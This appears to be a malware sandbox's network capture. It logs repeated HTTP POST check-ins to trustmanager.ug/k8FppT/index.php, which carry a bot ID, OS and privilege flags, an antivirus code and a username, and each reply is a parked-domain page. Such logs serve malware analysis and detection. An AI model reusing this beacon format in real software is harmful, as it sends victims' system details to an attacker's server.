Aug 23, 2021 02:09:19.095330000 CEST	19467	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.095374107 CEST	19467	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.237329006 CEST	19468	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:19.263461113 CEST	19469	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.263494015 CEST	19469	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.369820118 CEST	19570	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:19.396001101 CEST	19670	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.396027088 CEST	19670	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.515367985 CEST	19672	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:19.541598082 CEST	19674	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img 